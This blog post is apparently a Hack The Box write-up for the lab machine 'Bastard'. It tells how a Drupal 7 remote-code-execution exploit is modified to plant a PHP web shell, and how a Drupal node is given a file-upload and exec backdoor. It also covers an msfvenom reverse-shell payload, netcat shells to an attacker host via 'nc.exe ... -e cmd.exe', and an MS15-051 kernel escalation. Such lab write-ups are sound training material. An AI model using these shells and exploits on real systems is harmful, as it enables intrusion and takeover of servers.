Open in app

Sign in

Write

Sign in

Hackthebox writeup for Bastard machine

Sheetal Patil
5 min readJul 18, 2021

Mind Opener

What are the system methods in php, in how many ways can we use those system methods ? Can we modify the publicly available exploits to get code execution ?

If a CMS allows you to add code, can you add a code that will provide you a shell ?

Reconnaissance

nmap -sC -sV -p- 10.10.10.9

The nmap scan reveals many things like,

Open ports => 80, 135,49154 and accessible files(changelog.txt, robots.txt etc.)

Enumeration

Use droopescan for enumeration,

git clone https://github.com/droope/droopescan.git
cd droopescan
pip install -r requirements.txt

./droopescan scan -u 10.10.10.9

Google search tells us that this version of drupal is vulnerable to Remote Code Execution.

Download the exploit for 7.54 from google,

wget ​https://www.exploit-db.com/raw/41564 -O 41564.php

Trying to understand the exploit:

If you take a closer look at the exploit, the $file variable defines an associative array with two values, filename and the data.

The data parameter uses eval function to read raw data from the request body. First I simply ran the exploit without much modification, which returned an error “Failed to login with fake password”. The error is NOT a system generated but its returned by the program due to failed code execution.

The error was gone when I modified the endpoint to rest, the exploit completed successfully and the file dixuSOspsOUU.php is created, however the file returns a blank page.

Initial Foothold

So at this point, there are two possibilities that we can try,

  1. Generate an msfvenom payload, upload it instead of dixuSOspsOUU.php and grab a reverse shell (what we did in granny machine).
  2. Replace the eval() function by system() function through which we can achieve command execution.

First Method : Using msfvenom payload,

msfvenom -a php — platform php -p php/reverse_php LHOST=10.10.14.14 LPORT=4455 -f raw -o myshell.php

Now, modify the exploit with below code

With php interactive mode, we can see if the desired parameter values have been passed to our variables,

Next start a netcat listener at 4455, browse through the myshell.php file and get a shell,

However, this shell is not stable and stops intermittently.

So, having no option to upload a shell, what more can we try ? The next method I tried is by following the Ippsec. In the same exploit we have (eval(file_get_contents)) method, here we’ll modify this method by the system method and get shell.

$url = ‘http://10.10.10.9';

$endpoint_path = ‘/rest’;

$endpoint = ‘rest_endpoint’;

$file = [ ‘filename’ => ‘test.php’,

‘data’ => ‘<?php echo(system($_GET[“cmd”])); ?>’

];

Upon running the modified php exploit, two files are created, session.json and user.json.

Files created on running the exploit

The session file contains session information as follows.

With the help of cookie editor, copy the session parameters and it allows you to login

The test.php file that we uploaded by modifying the exploit, lets try to access it.

We have command execution ! Earlier, we tried to gain access by reverse shell method, but it fails. So this time we will upload nc to the target machine and get a bind shell.

This brings me the next hurdle, how to upload file on windows machine ? I read about many methods, for this machine I learnt smbserver.

  1. Using smb server
  2. By uploading a php code in a drupal module, which will help us achieve code execution and file upload.
  1. Get a bind shell with the help of smbserver

I created a share called “tryharder” with smbserver, and placed the nc executable in /home/kali.

Upload nc.exe on the victim machine with below command,

http://10.10.10.9/test.php?cmd=copy\\10.10.14.19\tryharder\nc.exe

Start a netcat listener and run the below command to get shell,

http://10.10.10.9/test.php?cmd=nc.exe 10.10.14.19 1234 -e cmd.exe

2. Get a reverse shell by adding php code in drupal modules :

Drupal installations come with multiple modules, we’ll try to abuse the functionality of one such module to get code execution.

In the modules section, select the php filters module and save configuration. Click on add content, add the below given code to be able to upload files to the server.

Note : Select the text format as php code

The first part of code allows us to upload a file and put its contents on the server via fupload variable. The second part of the code allows code execution via fexec variable.

The code has been added to /node/2? path

Next start a python server on the attacker machine

python3 -m http.server 4545

Serving HTTP on 0.0.0.0 port 4545 (http://0.0.0.0:4545/) …

Upload the nc.exe through the fupload variable

/node/2?fupload=nc.exe

/node/2?fupload=nc.exe 10.10.14.19 1234 -e cmd.exe

Grab a flag from the user’s directory

Privilage Escalation

Run systeminfo

This OS version is vulnerable to the kernel exploit. So we’ll use the exploit MS15–051. Download kernel exploits from SecWiki.

git clone https://github.com/SecWiki/windows-kernel-exploits

The MS15–051.exe <cmd> will execute the command,

smbserver allows executing a command without having the need to upload it and since this exploit executes a command with admin user’s privilege our reverse shell will be spawned as admin user.

And grab the flag,

Skills learnt from this box :

  1. Droopescan tool usage
  2. Modifying existing exploits and use of php interactive mode.
  3. Drupal modules exploitation
  4. SMB server usage for file uploads and priv esc
  5. Using kernel exploits like MS15–051

--

--

Sheetal Patil

Written by Sheetal Patil

14 Followers

Help

Status

About

Careers

Blog

Privacy

Terms

Text to speech

Teams